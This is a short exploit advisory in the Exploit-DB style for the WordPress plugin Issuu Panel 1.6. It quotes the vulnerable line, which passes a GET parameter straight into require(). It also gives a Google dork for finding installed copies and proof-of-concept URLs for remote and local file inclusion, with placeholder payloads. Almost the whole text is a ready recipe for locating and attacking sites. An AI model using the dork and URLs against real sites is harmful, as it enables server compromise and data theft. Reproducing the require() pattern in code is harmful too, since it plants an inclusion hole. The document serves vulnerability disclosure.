# Exploit Title: Wordpress Plugin Issuu Panel - RFI & LFI
# Exploit Author: CrashBandicot
# Date: 2016-03-23
# Google Dork : inurl:/wp-content/plugins/issuu-panel/
# Vendor Homepage: https://wordpress.org/plugins/issuu-panel/
# Tested on: MsWIn
# Version: 1.6
# Vulnerable File : menu/documento/requests/ajax-docs.php
3. require($_GET['abspath'] . '/wp-load.php');
# PoC : http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[RFI]
http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[LFI]